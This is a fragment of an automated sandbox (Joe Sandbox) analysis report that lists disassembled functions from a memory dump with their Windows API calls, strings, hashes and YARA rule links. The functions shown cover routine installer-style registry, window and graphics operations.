                                                                                                                                                                      • API String ID: 828529508-2866557904
                                                                                                                                                                      • Opcode ID: b27f9b3e6f76b85128dd725e59b0c91c9660a8888f4fa73667c2da94311569b4
                                                                                                                                                                      • Instruction ID: 08d6e73c43f4c72d4bf81f88f5f107f4332e42bd1359b104b354d246f0006fb7
                                                                                                                                                                      • Opcode Fuzzy Hash: b27f9b3e6f76b85128dd725e59b0c91c9660a8888f4fa73667c2da94311569b4
                                                                                                                                                                      • Instruction Fuzzy Hash: 14F0F6D034062237E620B6BFAC82F7B59CC8F9472AF140036F109EB2C2E96C9905427F
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00457E18 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00457E48
                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00457E69
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00457E9C), ref: 00457E8F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                                                                                                      • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                                                                                                      • API String ID: 2573145106-3235461205
                                                                                                                                                                      • Opcode ID: 56b35fa05c88681a00a859ddc93337a3d10cd59f42aa4552d9487cd775b13ffc
                                                                                                                                                                      • Instruction ID: 364c7453444e38e17299d149b0285d9f966ded63b706bec2a35302b816cfa9f1
                                                                                                                                                                      • Opcode Fuzzy Hash: 56b35fa05c88681a00a859ddc93337a3d10cd59f42aa4552d9487cd775b13ffc
                                                                                                                                                                      • Instruction Fuzzy Hash: 88018F71608304AFD711EBA99D03A2E73A9EB49715F6040B6FC10E72D3DA389D048619
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042DE3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32registrylibraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE48
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFE3,00000000,0042DFFB,?,?,?,?,00000006,?,00000000,00496D69), ref: 0042DE63
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE69
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressDeleteHandleModuleProc
                                                                                                                                                                      • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                                                                                                      • API String ID: 588496660-1846899949
                                                                                                                                                                      • Opcode ID: d1165879dc6c90990ed991bc4a8f8a104049bd9c4d4d51e9386fce99e78eb053
                                                                                                                                                                      • Instruction ID: 9c024767392e34e1239b6ccdb0e78e824d69575b4a8d701ce7db5acd733af5c1
                                                                                                                                                                      • Opcode Fuzzy Hash: d1165879dc6c90990ed991bc4a8f8a104049bd9c4d4d51e9386fce99e78eb053
                                                                                                                                                                      • Instruction Fuzzy Hash: B2E06DF1B41B30AAD72426697C8AFA72728DB74365F618537B105AD1A183FC1C50CE9D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042EA14 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004808CA), ref: 0042EA2D
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA33
                                                                                                                                                                      • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA44
                                                                                                                                                                        • Part of subcall function 0042E9A4: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA68,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9BA
                                                                                                                                                                        • Part of subcall function 0042E9A4: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C0
                                                                                                                                                                        • Part of subcall function 0042E9A4: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                                                                                                      • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                                                                                                      • API String ID: 3478007392-2676053874
                                                                                                                                                                      • Opcode ID: 6c1f2621f9590a243965a3ced5195e1c21d40a20f71fc5c38fd06ef4678b7bb0
                                                                                                                                                                      • Instruction ID: b6413d45aefc5bd916056b1696ea31cacbebf8ca5ba9e8247451a7316c99a6de
                                                                                                                                                                      • Opcode Fuzzy Hash: 6c1f2621f9590a243965a3ced5195e1c21d40a20f71fc5c38fd06ef4678b7bb0
                                                                                                                                                                      • Instruction Fuzzy Hash: C9E092A1741720EAEE10B7BA7D86FAA2558EB5072DF540037F100A51E1C7BD1C80CE9E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042E9A4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA68,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9BA
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C0
                                                                                                                                                                      • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                                                                                                      • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                                                                                                      • API String ID: 3478007392-2498399450
                                                                                                                                                                      • Opcode ID: a76621d5189c4755a13300c5ad66e01b353bfaf582b240c72f1d24bca62828cd
                                                                                                                                                                      • Instruction ID: 012688e8468ec3177747178b84a01981fc81215c8fc8f9e453d059575ed0bd59
                                                                                                                                                                      • Opcode Fuzzy Hash: a76621d5189c4755a13300c5ad66e01b353bfaf582b240c72f1d24bca62828cd
                                                                                                                                                                      • Instruction Fuzzy Hash: B5E0ECA1740314EAEA203B66BE8AF573558E724B19F54003BF100A51F2C7BC1C80CA9E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00477628 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderthreadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00477630
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477727,0049C0A4,00000000), ref: 00477643
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477649
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                                                                                                      • String ID: AllowSetForegroundWindow$user32.dll
                                                                                                                                                                      • API String ID: 1782028327-3855017861
                                                                                                                                                                      • Opcode ID: d17bbf44dcc16ee3c9dd3967772531d77005842ca2a146d92bba6a9a905d63db
                                                                                                                                                                      • Instruction ID: 000833d094a070652a329d30f0dc0cedfc4963abb7563544beb27e38e0473342
                                                                                                                                                                      • Opcode Fuzzy Hash: d17bbf44dcc16ee3c9dd3967772531d77005842ca2a146d92bba6a9a905d63db
                                                                                                                                                                      • Instruction Fuzzy Hash: 8DD05E90249B02A9D90073B94C46F6F224C8A90B68790843B7408F218ECA3CDC00AA3C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00416C24 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • BeginPaint.USER32(00000000,?), ref: 00416C4A
                                                                                                                                                                      • SaveDC.GDI32(?), ref: 00416C7B
                                                                                                                                                                      • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D3D), ref: 00416CDC
                                                                                                                                                                      • RestoreDC.GDI32(?,?), ref: 00416D03
                                                                                                                                                                      • EndPaint.USER32(00000000,?,00416D44,00000000,00416D3D), ref: 00416D37
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3808407030-0
                                                                                                                                                                      • Opcode ID: b6c8991bbe38a25b063fe02cbbd384aaa1ab048ef0fa4b5957116aa5db27c33c
                                                                                                                                                                      • Instruction ID: a024d51d8e1917fcb77b8775c892227abb36bb6ea51d3f2ecd71d44c14df9e09
                                                                                                                                                                      • Opcode Fuzzy Hash: b6c8991bbe38a25b063fe02cbbd384aaa1ab048ef0fa4b5957116aa5db27c33c
                                                                                                                                                                      • Instruction Fuzzy Hash: 90414170A04244AFCB04DBA9C595FAA77F5FF48304F1640AAE8459B362D778DD81CF54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004147F8 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 76268f3067fd7e5b2c462dbffcea77bb187ec6f22ea95bd0c2474c45d8462d54
                                                                                                                                                                      • Instruction ID: 35d93ad14ebc553eed2a21e9b47c67a907fa477780373b58b871235641bd8dc8
                                                                                                                                                                      • Opcode Fuzzy Hash: 76268f3067fd7e5b2c462dbffcea77bb187ec6f22ea95bd0c2474c45d8462d54
                                                                                                                                                                      • Instruction Fuzzy Hash: B23132746057409FC320EB69C584BABB7E8AF89714F04891EF9D9C7751C638EC818B19
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004297C4 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429800
                                                                                                                                                                      • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 0042982F
                                                                                                                                                                      • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0042984B
                                                                                                                                                                      • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 00429876
                                                                                                                                                                      • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00429894
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                      • Opcode ID: 9f4218a80dfb6ea41a935cea72b52cc504d621f6de5a3555e5000c6e6653befd
                                                                                                                                                                      • Instruction ID: c6a16a7b88e0b18788f8573a4e1e1ff521d0234e697c82a38616540cbd285451
                                                                                                                                                                      • Opcode Fuzzy Hash: 9f4218a80dfb6ea41a935cea72b52cc504d621f6de5a3555e5000c6e6653befd
                                                                                                                                                                      • Instruction Fuzzy Hash: 0621AF707507057AE710FB67DC82F8B7AECDB41708F54483EB905AB6D2DBB8AD418618
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0041BBB0 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 0041BBC2
                                                                                                                                                                      • GetSystemMetrics.USER32(0000000C), ref: 0041BBCC
                                                                                                                                                                      • 7406A670.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC0A
                                                                                                                                                                      • 74076410.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD75,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC51
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0041BC92
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MetricsSystem$740674076410A670DeleteObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 892726413-0
                                                                                                                                                                      • Opcode ID: e18963905fbda8c1d4957780915d0687961bfe8337bc9852c69d647676f2e28b
                                                                                                                                                                      • Instruction ID: 58bffdd5ee351b83518612b46dbf543796c6efca4902a0296a584a1adfede215
                                                                                                                                                                      • Opcode Fuzzy Hash: e18963905fbda8c1d4957780915d0687961bfe8337bc9852c69d647676f2e28b
                                                                                                                                                                      • Instruction Fuzzy Hash: E2317F70E00208EFDB04DFA5C942AAEB7F5EB48704F21856AF514EB381D7789E80DB95
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004733C0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0045CE6C: SetLastError.KERNEL32(00000057,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CED7
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,00473494,?,?,0049C1D0,00000000), ref: 0047344D
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,00473494,?,?,0049C1D0,00000000), ref: 00473463
                                                                                                                                                                      Strings
                                                                                                                                                                      • Could not set permissions on the registry key because it currently does not exist., xrefs: 00473457
                                                                                                                                                                      • Failed to set permissions on registry key (%d)., xrefs: 00473474
                                                                                                                                                                      • Setting permissions on registry key: %s\%s, xrefs: 00473412
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                                                                                                      • API String ID: 1452528299-4018462623
                                                                                                                                                                      • Opcode ID: 7dc1efdaf3098d268fe339c829c8562ff6b491225fbca112c276fb02c904b71f
                                                                                                                                                                      • Instruction ID: 1dcd38469e34a8f7cdaf58011d69bd772563d378ec45d4c1a9cd481a7780d06e
                                                                                                                                                                      • Opcode Fuzzy Hash: 7dc1efdaf3098d268fe339c829c8562ff6b491225fbca112c276fb02c904b71f
                                                                                                                                                                      • Instruction Fuzzy Hash: 9221B370A042445FCB05DFAAC8816EEBBE8DF49319F50817AE448E7392D77C5E058BAD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                                                                      • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocString
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 262959230-0
                                                                                                                                                                      • Opcode ID: fdbd74c082f9815823b504bab77549cef434610d295dd08879ffad668e8b5e0c
                                                                                                                                                                      • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                                                                                                      • Opcode Fuzzy Hash: fdbd74c082f9815823b504bab77549cef434610d295dd08879ffad668e8b5e0c
                                                                                                                                                                      • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004143D8 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • 74068900.GDI32(00000000,00000000,00000000), ref: 00414411
                                                                                                                                                                      • 74062350.GDI32(00000000,00000000,00000000,00000000), ref: 00414419
                                                                                                                                                                      • 74068900.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041442D
                                                                                                                                                                      • 74062350.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414433
                                                                                                                                                                      • 7406A580.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041443E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 7406235074068900$7406A580
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1127511431-0
                                                                                                                                                                      • Opcode ID: 2e378a44b9d760f9e5f1bf7c9b236df4e5f96ed4aa47b9fb48d5ba9b1bbdbb58
                                                                                                                                                                      • Instruction ID: 53d1df8a90047df028643ee63be254e951aa3f987763a81c259c8cb4a1af4cbb
                                                                                                                                                                      • Opcode Fuzzy Hash: 2e378a44b9d760f9e5f1bf7c9b236df4e5f96ed4aa47b9fb48d5ba9b1bbdbb58
